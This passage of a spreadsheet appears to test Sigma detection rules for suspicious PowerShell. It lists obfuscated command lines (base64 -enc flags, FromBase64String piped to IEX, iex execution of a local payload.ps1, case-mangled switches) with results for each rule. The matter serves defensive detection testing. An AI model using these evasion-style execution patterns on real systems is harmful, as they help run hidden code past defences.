    <row r="2061" ht="15.75" customHeight="1" s="42">
      <c r="A2061" s="43" t="n"/>
      <c r="B2061" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_encode</t>
        </is>
      </c>
      <c r="C2061" s="44" t="inlineStr">
        <is>
          <t>Suspicious Execution of Powershell with Base64</t>
        </is>
      </c>
      <c r="D2061" s="44" t="inlineStr">
        <is>
          <t>fb843269-508c-4b76-8b8d-88679db22ce7</t>
        </is>
      </c>
      <c r="E2061" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -enc JABoAG8AcwB0AG4AYQBtAGUA -Encoding Unicode</t>
        </is>
      </c>
      <c r="F2061" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2061" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2061" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2061" s="43" t="inlineStr">
        <is>
          <t>Suspicious Encoded PowerShell Command Line (ca2092a1-c273-4878-9b4b-0d60115bf5ea); Suspicious PowerShell Encoded Command Patterns (b9d9cc83-380b-4ba3-8d8f-60c0e7e2930c)</t>
        </is>
      </c>
      <c r="J2061" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2061" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2062" ht="15.75" customHeight="1" s="42">
      <c r="A2062" s="43" t="n"/>
      <c r="B2062" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_encode</t>
        </is>
      </c>
      <c r="C2062" s="44" t="inlineStr">
        <is>
          <t>Suspicious Execution of Powershell with Base64</t>
        </is>
      </c>
      <c r="D2062" s="44" t="inlineStr">
        <is>
          <t>fb843269-508c-4b76-8b8d-88679db22ce7</t>
        </is>
      </c>
      <c r="E2062" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -EncodedCommand JABoAG8AcwB0AG4AYQBtAGUA -Encoding Unicode</t>
        </is>
      </c>
      <c r="F2062" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2062" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2062" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2062" s="43" t="inlineStr">
        <is>
          <t>Suspicious Encoded PowerShell Command Line (ca2092a1-c273-4878-9b4b-0d60115bf5ea); Suspicious PowerShell Encoded Command Patterns (b9d9cc83-380b-4ba3-8d8f-60c0e7e2930c)</t>
        </is>
      </c>
      <c r="J2062" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2062" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2063" ht="15.75" customHeight="1" s="42">
      <c r="A2063" s="43" t="n"/>
      <c r="B2063" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_encode</t>
        </is>
      </c>
      <c r="C2063" s="44" t="inlineStr">
        <is>
          <t>Suspicious Execution of Powershell with Base64</t>
        </is>
      </c>
      <c r="D2063" s="44" t="inlineStr">
        <is>
          <t>fb843269-508c-4b76-8b8d-88679db22ce7</t>
        </is>
      </c>
      <c r="E2063" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -eNc JABoAG8AcwB0AG4AYQBtAGUA -Encoding Unicode</t>
        </is>
      </c>
      <c r="F2063" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2063" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2063" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2063" s="43" t="inlineStr">
        <is>
          <t>Suspicious Encoded PowerShell Command Line (ca2092a1-c273-4878-9b4b-0d60115bf5ea); Suspicious PowerShell Encoded Command Patterns (b9d9cc83-380b-4ba3-8d8f-60c0e7e2930c)</t>
        </is>
      </c>
      <c r="J2063" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2063" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2064" ht="15.75" customHeight="1" s="42">
      <c r="A2064" s="43" t="n"/>
      <c r="B2064" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_encode</t>
        </is>
      </c>
      <c r="C2064" s="44" t="inlineStr">
        <is>
          <t>Suspicious Execution of Powershell with Base64</t>
        </is>
      </c>
      <c r="D2064" s="44" t="inlineStr">
        <is>
          <t>fb843269-508c-4b76-8b8d-88679db22ce7</t>
        </is>
      </c>
      <c r="E2064" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -EncodedCommand JABoAG8AcwB0AG4AYQBtAGUA -EnCOdiNG Unicode</t>
        </is>
      </c>
      <c r="F2064" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2064" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2064" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2064" s="43" t="inlineStr">
        <is>
          <t>Suspicious Encoded PowerShell Command Line (ca2092a1-c273-4878-9b4b-0d60115bf5ea); Suspicious PowerShell Encoded Command Patterns (b9d9cc83-380b-4ba3-8d8f-60c0e7e2930c)</t>
        </is>
      </c>
      <c r="J2064" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2064" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2065" ht="15.75" customHeight="1" s="42">
      <c r="A2065" s="43" t="n"/>
      <c r="B2065" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_encode</t>
        </is>
      </c>
      <c r="C2065" s="44" t="inlineStr">
        <is>
          <t>Suspicious Execution of Powershell with Base64</t>
        </is>
      </c>
      <c r="D2065" s="44" t="inlineStr">
        <is>
          <t>fb843269-508c-4b76-8b8d-88679db22ce7</t>
        </is>
      </c>
      <c r="E2065" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -EncodedCommand JABoAG8AcwB0AG4AYQBtAGUA -EnCOdiNg Unicode</t>
        </is>
      </c>
      <c r="F2065" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2065" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2065" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2065" s="44" t="inlineStr">
        <is>
          <t>Suspicious Encoded PowerShell Command Line (ca2092a1-c273-4878-9b4b-0d60115bf5ea); Suspicious PowerShell Encoded Command Patterns (b9d9cc83-380b-4ba3-8d8f-60c0e7e2930c)</t>
        </is>
      </c>
      <c r="J2065" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2065" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2066" ht="15.75" customHeight="1" s="42">
      <c r="A2066" s="43" t="n"/>
      <c r="B2066" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_encode</t>
        </is>
      </c>
      <c r="C2066" s="44" t="inlineStr">
        <is>
          <t>Suspicious Execution of Powershell with Base64</t>
        </is>
      </c>
      <c r="D2066" s="44" t="inlineStr">
        <is>
          <t>fb843269-508c-4b76-8b8d-88679db22ce7</t>
        </is>
      </c>
      <c r="E2066" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -EncodedCommand JABoAG8AcwB0AG4AYQBtAGUA -enCODInG Unicode</t>
        </is>
      </c>
      <c r="F2066" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2066" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2066" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2066" s="44" t="inlineStr">
        <is>
          <t>Suspicious Encoded PowerShell Command Line (ca2092a1-c273-4878-9b4b-0d60115bf5ea); Suspicious PowerShell Encoded Command Patterns (b9d9cc83-380b-4ba3-8d8f-60c0e7e2930c)</t>
        </is>
      </c>
      <c r="J2066" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2066" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2067" ht="15.75" customHeight="1" s="42">
      <c r="A2067" s="43" t="n"/>
      <c r="B2067" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_encode</t>
        </is>
      </c>
      <c r="C2067" s="44" t="inlineStr">
        <is>
          <t>Suspicious Execution of Powershell with Base64</t>
        </is>
      </c>
      <c r="D2067" s="44" t="inlineStr">
        <is>
          <t>fb843269-508c-4b76-8b8d-88679db22ce7</t>
        </is>
      </c>
      <c r="E2067" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /e JABoAG8AcwB0AG4AYQBtAGUA</t>
        </is>
      </c>
      <c r="F2067" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2067" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2067" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2067" s="44" t="n"/>
      <c r="J2067" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2067" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2068" ht="15.75" customHeight="1" s="42">
      <c r="A2068" s="43" t="n"/>
      <c r="B2068" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_encode</t>
        </is>
      </c>
      <c r="C2068" s="44" t="inlineStr">
        <is>
          <t>Suspicious Execution of Powershell with Base64</t>
        </is>
      </c>
      <c r="D2068" s="44" t="inlineStr">
        <is>
          <t>fb843269-508c-4b76-8b8d-88679db22ce7</t>
        </is>
      </c>
      <c r="E2068" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /E JABoAG8AcwB0AG4AYQBtAGUA</t>
        </is>
      </c>
      <c r="F2068" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2068" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2068" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2068" s="44" t="n"/>
      <c r="J2068" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2068" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2069" ht="15.75" customHeight="1" s="42">
      <c r="A2069" s="43" t="n"/>
      <c r="B2069" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_encoding_patterns</t>
        </is>
      </c>
      <c r="C2069" s="44" t="inlineStr">
        <is>
          <t>Potential Encoded PowerShell Patterns In CommandLine</t>
        </is>
      </c>
      <c r="D2069" s="44" t="inlineStr">
        <is>
          <t>cdf05894-89e7-4ead-b2b0-0a5f97a90f2f</t>
        </is>
      </c>
      <c r="E2069" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('V3JpdGUtSG9zdCAiSGVsbG8i')) | IEX"</t>
        </is>
      </c>
      <c r="F2069" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2069" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2069" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2069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69" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2069" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2070" ht="15.75" customHeight="1" s="42">
      <c r="A2070" s="43" t="n"/>
      <c r="B2070" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_encoding_patterns</t>
        </is>
      </c>
      <c r="C2070" s="44" t="inlineStr">
        <is>
          <t>Potential Encoded PowerShell Patterns In CommandLine</t>
        </is>
      </c>
      <c r="D2070" s="44" t="inlineStr">
        <is>
          <t>cdf05894-89e7-4ead-b2b0-0a5f97a90f2f</t>
        </is>
      </c>
      <c r="E2070" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOmMANd "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('V3JpdGUtSG9zdCAiSGVsbG8i')) | IEX"</t>
        </is>
      </c>
      <c r="F2070" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2070" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2070" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2070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70" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2070" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2071" ht="15.75" customHeight="1" s="42">
      <c r="A2071" s="43" t="n"/>
      <c r="B2071" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_encoding_patterns</t>
        </is>
      </c>
      <c r="C2071" s="44" t="inlineStr">
        <is>
          <t>Potential Encoded PowerShell Patterns In CommandLine</t>
        </is>
      </c>
      <c r="D2071" s="44" t="inlineStr">
        <is>
          <t>cdf05894-89e7-4ead-b2b0-0a5f97a90f2f</t>
        </is>
      </c>
      <c r="E2071" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -CoMmaND "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('V3JpdGUtSG9zdCAiSGVsbG8i')) | IEX"</t>
        </is>
      </c>
      <c r="F2071" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2071" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2071" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2071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71" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2071" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2072" ht="15.75" customHeight="1" s="42">
      <c r="A2072" s="43" t="n"/>
      <c r="B2072" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_encoding_patterns</t>
        </is>
      </c>
      <c r="C2072" s="44" t="inlineStr">
        <is>
          <t>Potential Encoded PowerShell Patterns In CommandLine</t>
        </is>
      </c>
      <c r="D2072" s="44" t="inlineStr">
        <is>
          <t>cdf05894-89e7-4ead-b2b0-0a5f97a90f2f</t>
        </is>
      </c>
      <c r="E2072" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -COMMaNd "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('V3JpdGUtSG9zdCAiSGVsbG8i')) | IEX"</t>
        </is>
      </c>
      <c r="F2072" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2072" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2072" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2072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72" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2072" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2073" ht="15.75" customHeight="1" s="42">
      <c r="A2073" s="43" t="n"/>
      <c r="B2073" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_encoding_patterns</t>
        </is>
      </c>
      <c r="C2073" s="44" t="inlineStr">
        <is>
          <t>Potential Encoded PowerShell Patterns In CommandLine</t>
        </is>
      </c>
      <c r="D2073" s="44" t="inlineStr">
        <is>
          <t>cdf05894-89e7-4ead-b2b0-0a5f97a90f2f</t>
        </is>
      </c>
      <c r="E2073" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -CoMmANd "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('V3JpdGUtSG9zdCAiSGVsbG8i')) | IEX"</t>
        </is>
      </c>
      <c r="F2073" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2073" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2073" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2073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73" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2073" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2074" ht="15.75" customHeight="1" s="42">
      <c r="A2074" s="43" t="n"/>
      <c r="B2074" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_encoding_patterns</t>
        </is>
      </c>
      <c r="C2074" s="44" t="inlineStr">
        <is>
          <t>Potential Encoded PowerShell Patterns In CommandLine</t>
        </is>
      </c>
      <c r="D2074" s="44" t="inlineStr">
        <is>
          <t>cdf05894-89e7-4ead-b2b0-0a5f97a90f2f</t>
        </is>
      </c>
      <c r="E2074" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('V3JpdGUtSG9zdCAiSGVsbG8i')) | IEX"</t>
        </is>
      </c>
      <c r="F2074" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2074" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2074" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2074" s="44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2074" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2074" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2075" ht="15.75" customHeight="1" s="42">
      <c r="A2075" s="43" t="n"/>
      <c r="B2075" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_exec_data_file</t>
        </is>
      </c>
      <c r="C2075" s="44" t="inlineStr">
        <is>
          <t>Powershell Inline Execution From A File</t>
        </is>
      </c>
      <c r="D2075" s="44" t="inlineStr">
        <is>
          <t>ee218c12-627a-4d27-9e30-d6fb2fe22ed2</t>
        </is>
      </c>
      <c r="E2075" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "&amp; (cat C:\temp\payload.ps1 -raw)"</t>
        </is>
      </c>
      <c r="F2075" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2075" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2075" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2075" s="43" t="inlineStr">
        <is>
          <t>Suspicious Program Names (efdd8dd5-cee8-4e59-9390-7d4d5e4dd6f6); Suspicious Program Names (efdd8dd5-cee8-4e59-9390-7d4d5e4dd6f6)</t>
        </is>
      </c>
      <c r="J2075" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2075" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2076" ht="15.75" customHeight="1" s="42">
      <c r="A2076" s="43" t="n"/>
      <c r="B2076" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_exec_data_file</t>
        </is>
      </c>
      <c r="C2076" s="44" t="inlineStr">
        <is>
          <t>Powershell Inline Execution From A File</t>
        </is>
      </c>
      <c r="D2076" s="44" t="inlineStr">
        <is>
          <t>ee218c12-627a-4d27-9e30-d6fb2fe22ed2</t>
        </is>
      </c>
      <c r="E2076" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "&amp; (cat C:\temp\payload.ps1 -raw)"</t>
        </is>
      </c>
      <c r="F2076" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2076" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2076" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2076" s="43" t="inlineStr">
        <is>
          <t>Suspicious Program Names (efdd8dd5-cee8-4e59-9390-7d4d5e4dd6f6); Suspicious Program Names (efdd8dd5-cee8-4e59-9390-7d4d5e4dd6f6)</t>
        </is>
      </c>
      <c r="J2076" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2076" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2077" ht="15.75" customHeight="1" s="42">
      <c r="A2077" s="43" t="n"/>
      <c r="B2077" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_exec_data_file</t>
        </is>
      </c>
      <c r="C2077" s="44" t="inlineStr">
        <is>
          <t>Powershell Inline Execution From A File</t>
        </is>
      </c>
      <c r="D2077" s="44" t="inlineStr">
        <is>
          <t>ee218c12-627a-4d27-9e30-d6fb2fe22ed2</t>
        </is>
      </c>
      <c r="E2077" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -C "&amp; (cat C:\temp\payload.ps1 -raw)"</t>
        </is>
      </c>
      <c r="F2077" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2077" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2077" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2077" s="43" t="inlineStr">
        <is>
          <t>Suspicious Program Names (efdd8dd5-cee8-4e59-9390-7d4d5e4dd6f6); Suspicious Program Names (efdd8dd5-cee8-4e59-9390-7d4d5e4dd6f6)</t>
        </is>
      </c>
      <c r="J2077" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2077" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2078" ht="15.75" customHeight="1" s="42">
      <c r="A2078" s="43" t="n"/>
      <c r="B2078" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_exec_data_file</t>
        </is>
      </c>
      <c r="C2078" s="44" t="inlineStr">
        <is>
          <t>Powershell Inline Execution From A File</t>
        </is>
      </c>
      <c r="D2078" s="44" t="inlineStr">
        <is>
          <t>ee218c12-627a-4d27-9e30-d6fb2fe22ed2</t>
        </is>
      </c>
      <c r="E2078" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "[scriptblock]::Create((cat C:\temp\payload.ps1 -raw)).Invoke()"</t>
        </is>
      </c>
      <c r="F2078" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2078" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2078" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2078" s="43" t="inlineStr">
        <is>
          <t>Suspicious Program Names (efdd8dd5-cee8-4e59-9390-7d4d5e4dd6f6); Suspicious Program Names (efdd8dd5-cee8-4e59-9390-7d4d5e4dd6f6)</t>
        </is>
      </c>
      <c r="J2078" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2078" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2079" ht="15.75" customHeight="1" s="42">
      <c r="A2079" s="43" t="n"/>
      <c r="B2079" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_exec_data_file</t>
        </is>
      </c>
      <c r="C2079" s="44" t="inlineStr">
        <is>
          <t>Powershell Inline Execution From A File</t>
        </is>
      </c>
      <c r="D2079" s="44" t="inlineStr">
        <is>
          <t>ee218c12-627a-4d27-9e30-d6fb2fe22ed2</t>
        </is>
      </c>
      <c r="E2079" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -C "[scriptblock]::Create((cat C:\temp\payload.ps1 -raw)).Invoke()"</t>
        </is>
      </c>
      <c r="F2079" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2079" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2079" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2079" s="43" t="inlineStr">
        <is>
          <t>Suspicious Program Names (efdd8dd5-cee8-4e59-9390-7d4d5e4dd6f6); Suspicious Program Names (efdd8dd5-cee8-4e59-9390-7d4d5e4dd6f6)</t>
        </is>
      </c>
      <c r="J2079" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2079" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2080" ht="15.75" customHeight="1" s="42">
      <c r="A2080" s="43" t="n"/>
      <c r="B2080" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_exec_data_file</t>
        </is>
      </c>
      <c r="C2080" s="44" t="inlineStr">
        <is>
          <t>Powershell Inline Execution From A File</t>
        </is>
      </c>
      <c r="D2080" s="44" t="inlineStr">
        <is>
          <t>ee218c12-627a-4d27-9e30-d6fb2fe22ed2</t>
        </is>
      </c>
      <c r="E2080" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "[scriptblock]::Create((cat C:\temp\payload.ps1 -raw)).Invoke()"</t>
        </is>
      </c>
      <c r="F2080" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2080" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2080" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2080" s="43" t="inlineStr">
        <is>
          <t>Suspicious Program Names (efdd8dd5-cee8-4e59-9390-7d4d5e4dd6f6); Suspicious Program Names (efdd8dd5-cee8-4e59-9390-7d4d5e4dd6f6)</t>
        </is>
      </c>
      <c r="J2080" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2080" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2081" ht="15.75" customHeight="1" s="42">
      <c r="A2081" s="43" t="n"/>
      <c r="B2081" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_exec_data_file</t>
        </is>
      </c>
      <c r="C2081" s="44" t="inlineStr">
        <is>
          <t>Powershell Inline Execution From A File</t>
        </is>
      </c>
      <c r="D2081" s="44" t="inlineStr">
        <is>
          <t>ee218c12-627a-4d27-9e30-d6fb2fe22ed2</t>
        </is>
      </c>
      <c r="E2081" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "iex (gc C:\temp\payload.ps1 -raw)"</t>
        </is>
      </c>
      <c r="F2081" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2081" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2081" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2081" s="43" t="inlineStr">
        <is>
          <t>Suspicious Program Names (efdd8dd5-cee8-4e59-9390-7d4d5e4dd6f6); Suspicious Program Names (efdd8dd5-cee8-4e59-9390-7d4d5e4dd6f6)</t>
        </is>
      </c>
      <c r="J2081" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2081" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2082" ht="15.75" customHeight="1" s="42">
      <c r="A2082" s="43" t="n"/>
      <c r="B2082" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_exec_data_file</t>
        </is>
      </c>
      <c r="C2082" s="44" t="inlineStr">
        <is>
          <t>Powershell Inline Execution From A File</t>
        </is>
      </c>
      <c r="D2082" s="44" t="inlineStr">
        <is>
          <t>ee218c12-627a-4d27-9e30-d6fb2fe22ed2</t>
        </is>
      </c>
      <c r="E2082" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "iex (gc C:\temp\payload.ps1 -raw)"</t>
        </is>
      </c>
      <c r="F2082" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2082" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2082" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2082" s="43" t="inlineStr">
        <is>
          <t>Suspicious Program Names (efdd8dd5-cee8-4e59-9390-7d4d5e4dd6f6); Suspicious Program Names (efdd8dd5-cee8-4e59-9390-7d4d5e4dd6f6)</t>
        </is>
      </c>
      <c r="J2082" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2082" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2083" ht="15.75" customHeight="1" s="42">
      <c r="A2083" s="43" t="n"/>
      <c r="B2083" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_exec_data_file</t>
        </is>
      </c>
      <c r="C2083" s="44" t="inlineStr">
        <is>
          <t>Powershell Inline Execution From A File</t>
        </is>
      </c>
      <c r="D2083" s="44" t="inlineStr">
        <is>
          <t>ee218c12-627a-4d27-9e30-d6fb2fe22ed2</t>
        </is>
      </c>
      <c r="E2083" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -C "iex (gc C:\temp\payload.ps1 -raw)"</t>
        </is>
      </c>
      <c r="F2083" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2083" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2083" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2083" s="43" t="inlineStr">
        <is>
          <t>Suspicious Program Names (efdd8dd5-cee8-4e59-9390-7d4d5e4dd6f6); Suspicious Program Names (efdd8dd5-cee8-4e59-9390-7d4d5e4dd6f6)</t>
        </is>
      </c>
      <c r="J2083" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2083" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2084" ht="15.75" customHeight="1" s="42">
      <c r="A2084" s="43" t="n"/>
      <c r="B2084" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_exec_data_file</t>
        </is>
      </c>
      <c r="C2084" s="44" t="inlineStr">
        <is>
          <t>Powershell Inline Execution From A File</t>
        </is>
      </c>
      <c r="D2084" s="44" t="inlineStr">
        <is>
          <t>ee218c12-627a-4d27-9e30-d6fb2fe22ed2</t>
        </is>
      </c>
      <c r="E2084" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "iex (Get-Content C:\temp\payload.ps1 -ra)"</t>
        </is>
      </c>
      <c r="F2084" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2084" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2084" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2084" s="43" t="inlineStr">
        <is>
          <t>Suspicious Program Names (efdd8dd5-cee8-4e59-9390-7d4d5e4dd6f6); Suspicious Program Names (efdd8dd5-cee8-4e59-9390-7d4d5e4dd6f6)</t>
        </is>
      </c>
      <c r="J2084" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2084" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2085" ht="15.75" customHeight="1" s="42">
      <c r="A2085" s="43" t="n"/>
      <c r="B2085" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_exec_data_file</t>
        </is>
      </c>
      <c r="C2085" s="44" t="inlineStr">
        <is>
          <t>Powershell Inline Execution From A File</t>
        </is>
      </c>
      <c r="D2085" s="44" t="inlineStr">
        <is>
          <t>ee218c12-627a-4d27-9e30-d6fb2fe22ed2</t>
        </is>
      </c>
      <c r="E2085" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "iex (Get-Content C:\temp\payload.ps1 -ra)"</t>
        </is>
      </c>
      <c r="F2085" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2085" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2085" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2085" s="43" t="inlineStr">
        <is>
          <t>Suspicious Program Names (efdd8dd5-cee8-4e59-9390-7d4d5e4dd6f6); Suspicious Program Names (efdd8dd5-cee8-4e59-9390-7d4d5e4dd6f6)</t>
        </is>
      </c>
      <c r="J2085" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2085" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2086" ht="15.75" customHeight="1" s="42">
      <c r="A2086" s="43" t="n"/>
      <c r="B2086" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_export_certificate</t>
        </is>
      </c>
      <c r="C2086" s="44" t="inlineStr">
